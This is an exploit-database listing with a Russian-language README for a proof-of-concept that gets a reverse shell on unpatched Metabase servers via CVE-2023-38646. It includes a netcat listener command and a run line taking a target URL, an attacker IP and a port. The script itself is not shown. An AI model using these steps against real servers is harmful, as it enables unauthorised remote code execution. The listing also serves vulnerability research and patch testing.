Sploitus

Exploit for CVE-2023-38646

kitploit · 2026-09-02

Exploit Code

MARKDOWN31 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MRUNALKARAN-CVE-2023-38646
# Metabase Pre-Auth RCE POC - CVE-2023-38646

Metabase с открытым исходным кодом до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере. Я написал скрипт для непосредственного получения reverse shell на машине атакующего.

## Использование

Скрипту требуются URL цели, IP и порт атакующего. Указывать setup token не требуется для этого эксплойта, так как скрипт пытается получить его из `/api/session/properties`.

Убедитесь, что на машине атакующего запущен netcat listener, используя следующую команду: `nc -nlvp {Port}`

Запустите POC-скрипт со следующими параметрами:

  * -u - URL цели (Metabase)
  * -ip - IP атакующего
  * -p - номер порта



root@kitploit:~
    
    
    python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
    

![POC](https://assets.kitploit.com/production/public/readmes/38149/a49b01c17a3537df85facac2e7d4b31e1034f19c93e556c43acf2c101a4180cc.jpg)

## Ссылки

  * https://github.com/m3m0o/metabase-pre-auth-rce-poc/
  * https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/